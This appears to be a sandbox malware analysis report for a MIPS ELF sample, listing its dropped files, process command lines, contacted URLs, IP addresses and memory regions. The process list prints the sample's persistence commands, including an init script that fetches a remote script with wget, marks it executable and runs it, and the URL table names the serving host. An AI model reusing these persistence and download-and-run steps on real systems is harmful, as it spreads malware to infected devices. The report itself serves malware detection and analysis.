Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
mipsel.nn.elf
|
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/mipsel.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
||
|
/tmp/qemu-open.aRFftE (deleted)
|
ASCII text, with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/mipsel.nn.elf
|
/tmp/mipsel.nn.elf
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n
/tmp/mipsel.nn.elf &\n wget eqqm7,,.60+.10+.+4-, -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n
*)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mipsel.nn.elf
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70//usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/powe
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
187.111.11.224
|
unknown
|
Brazil
|
||
|
76.18.204.155
|
unknown
|
United States
|
||
|
87.89.88.222
|
unknown
|
France
|
||
|
174.177.28.82
|
unknown
|
United States
|
||
|
83.113.230.175
|
unknown
|
France
|
||
|
141.29.97.74
|
unknown
|
Germany
|
||
|
107.79.89.98
|
unknown
|
United States
|
||
|
19.86.46.57
|
unknown
|
United States
|
||
|
32.220.42.85
|
unknown
|
United States
|
||
|
58.176.175.74
|
unknown
|
Hong Kong
|
||
|
94.208.186.15
|
unknown
|
Netherlands
|
||
|
15.135.177.88
|
unknown
|
United States
|
||
|
116.121.204.49
|
unknown
|
Korea Republic of
|
||
|
167.145.221.138
|
unknown
|
United States
|
||
|
124.126.165.56
|
unknown
|
China
|
||
|
202.73.139.162
|
unknown
|
Japan
|
||
|
171.115.189.130
|
unknown
|
China
|
||
|
198.37.79.116
|
unknown
|
United States
|
||
|
217.2.25.205
|
unknown
|
Germany
|
||
|
39.31.203.136
|
unknown
|
Korea Republic of
|
||
|
191.36.67.19
|
unknown
|
Brazil
|
||
|
132.38.176.83
|
unknown
|
United States
|
||
|
150.127.131.227
|
unknown
|
United States
|
||
|
213.1.106.155
|
unknown
|
United Kingdom
|
||
|
52.210.242.75
|
unknown
|
United States
|
||
|
196.58.121.103
|
unknown
|
Seychelles
|
||
|
59.221.209.80
|
unknown
|
China
|
||
|
128.245.202.119
|
unknown
|
United States
|
||
|
130.159.52.44
|
unknown
|
United Kingdom
|
||
|
86.138.18.178
|
unknown
|
United Kingdom
|
||
|
150.121.81.172
|
unknown
|
China
|
||
|
199.27.6.248
|
unknown
|
Reserved
|
||
|
42.190.212.111
|
unknown
|
Malaysia
|
||
|
72.178.184.240
|
unknown
|
United States
|
||
|
151.216.210.245
|
unknown
|
unknown
|
||
|
5.10.71.145
|
unknown
|
Netherlands
|
||
|
159.11.201.24
|
unknown
|
United States
|
||
|
9.55.172.195
|
unknown
|
United States
|
||
|
82.250.33.51
|
unknown
|
France
|
||
|
120.104.92.186
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
41.201.253.76
|
unknown
|
Algeria
|
||
|
188.225.235.121
|
unknown
|
Palestinian Territory Occupied
|
||
|
33.251.136.46
|
unknown
|
United States
|
||
|
44.242.249.220
|
unknown
|
United States
|
||
|
85.74.104.70
|
unknown
|
Greece
|
||
|
19.1.253.51
|
unknown
|
United States
|
||
|
158.158.207.225
|
unknown
|
Singapore
|
||
|
123.147.114.170
|
unknown
|
China
|
||
|
17.138.126.62
|
unknown
|
United States
|
||
|
207.5.130.233
|
unknown
|
United States
|
||
|
63.62.61.173
|
unknown
|
United States
|
||
|
202.43.92.14
|
unknown
|
Indonesia
|
||
|
111.254.136.55
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
191.228.205.95
|
unknown
|
Brazil
|
||
|
45.193.101.73
|
unknown
|
Seychelles
|
||
|
143.22.203.122
|
unknown
|
United States
|
||
|
161.210.6.58
|
unknown
|
United States
|
||
|
26.251.88.197
|
unknown
|
United States
|
||
|
113.37.158.242
|
unknown
|
Japan
|
||
|
159.101.48.92
|
unknown
|
United Kingdom
|
||
|
118.253.42.120
|
unknown
|
China
|
||
|
125.53.178.29
|
unknown
|
Japan
|
||
|
115.203.21.219
|
unknown
|
China
|
||
|
113.55.149.50
|
unknown
|
China
|
||
|
180.106.246.13
|
unknown
|
China
|
||
|
211.94.215.34
|
unknown
|
China
|
||
|
192.64.144.95
|
unknown
|
United States
|
||
|
187.71.183.228
|
unknown
|
Brazil
|
||
|
191.79.221.31
|
unknown
|
Colombia
|
||
|
57.167.103.59
|
unknown
|
Belgium
|
||
|
189.95.122.228
|
unknown
|
Brazil
|
||
|
183.97.104.69
|
unknown
|
Korea Republic of
|
||
|
33.77.218.96
|
unknown
|
United States
|
||
|
188.240.230.166
|
unknown
|
Romania
|
||
|
216.55.71.178
|
unknown
|
United States
|
||
|
142.121.146.24
|
unknown
|
Canada
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
207.66.194.247
|
unknown
|
United States
|
||
|
143.153.176.60
|
unknown
|
United States
|
||
|
181.36.190.35
|
unknown
|
Dominican Republic
|
||
|
119.76.44.215
|
unknown
|
Thailand
|
||
|
206.33.219.226
|
unknown
|
United States
|
||
|
166.64.91.170
|
unknown
|
Australia
|
||
|
23.225.247.211
|
unknown
|
United States
|
||
|
129.163.10.111
|
unknown
|
United States
|
||
|
183.242.111.185
|
unknown
|
China
|
||
|
5.93.41.132
|
unknown
|
Italy
|
||
|
60.139.54.36
|
unknown
|
Japan
|
||
|
134.133.74.94
|
unknown
|
United States
|
||
|
185.10.156.251
|
unknown
|
Netherlands
|
||
|
221.0.201.58
|
unknown
|
China
|
||
|
145.214.250.55
|
unknown
|
Netherlands
|
||
|
125.42.17.118
|
unknown
|
China
|
||
|
213.254.176.44
|
unknown
|
United Kingdom
|
||
|
16.75.50.172
|
unknown
|
United States
|
||
|
173.76.121.241
|
unknown
|
United States
|
||
|
78.26.82.161
|
unknown
|
Italy
|
||
|
79.62.54.196
|
unknown
|
Italy
|
||
|
77.161.55.62
|
unknown
|
Netherlands
|
||
|
137.62.110.247
|
unknown
|
Switzerland
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f2c50422000
|
page execute read
|
|
||
|
7f2c50422000
|
page execute read
|
|
||
|
55cd6b4af000
|
page execute and read and write
|
|||
|
7f2cd6b01000
|
page read and write
|
|||
|
55cd694b1000
|
page read and write
|
|||
|
7f2cd756a000
|
page read and write
|
|||
|
7f2c50463000
|
page read and write
|
|||
|
55cd6b4af000
|
page execute and read and write
|
|||
|
7f2cd6ea2000
|
page read and write
|
|||
|
7f2cd0000000
|
page read and write
|
|||
|
7f2cd751d000
|
page read and write
|
|||
|
7f2cd756a000
|
page read and write
|
|||
|
7f2cd7213000
|
page read and write
|
|||
|
7f2cd0021000
|
page read and write
|
|||
|
7f2cd603b000
|
page read and write
|
|||
|
7f2cd7525000
|
page read and write
|
|||
|
7f2cd6ec5000
|
page read and write
|
|||
|
55cd6b4c6000
|
page read and write
|
|||
|
7f2cd603b000
|
page read and write
|
|||
|
7f2cd6ee2000
|
page read and write
|
|||
|
7f2c50467000
|
page read and write
|
|||
|
7f2cd0000000
|
page read and write
|
|||
|
7f2cd6b01000
|
page read and write
|
|||
|
55cd6b4c6000
|
page read and write
|
|||
|
55cd6921f000
|
page execute read
|
|||
|
55cd694a7000
|
page read and write
|
|||
|
7f2cd73f4000
|
page read and write
|
|||
|
7ffc90bbb000
|
page read and write
|
|||
|
7ffc90bdd000
|
page execute read
|
|||
|
7f2cd6ee2000
|
page read and write
|
|||
|
55cd6ccb3000
|
page read and write
|
|||
|
7f2cd6851000
|
page read and write
|
|||
|
55cd694a7000
|
page read and write
|
|||
|
7f2cd6843000
|
page read and write
|
|||
|
7f2cd6ec5000
|
page read and write
|
|||
|
7f2cd6851000
|
page read and write
|
|||
|
7f2cd7525000
|
page read and write
|
|||
|
7f2cd73f4000
|
page read and write
|
|||
|
7f2cd7213000
|
page read and write
|
|||
|
7ffc90bdd000
|
page execute read
|
|||
|
7f2cd6ea2000
|
page read and write
|
|||
|
7f2c50463000
|
page read and write
|
|||
|
7f2c5046c000
|
page read and write
|
|||
|
55cd6ccb3000
|
page read and write
|
|||
|
7f2cd6843000
|
page read and write
|
|||
|
55cd694b1000
|
page read and write
|
|||
|
7ffc90bbb000
|
page read and write
|
|||
|
55cd6921f000
|
page execute read
|
|||
|
7f2c50467000
|
page read and write
|
|||
|
7f2cd751d000
|
page read and write
|
|||
|
7f2cd0021000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.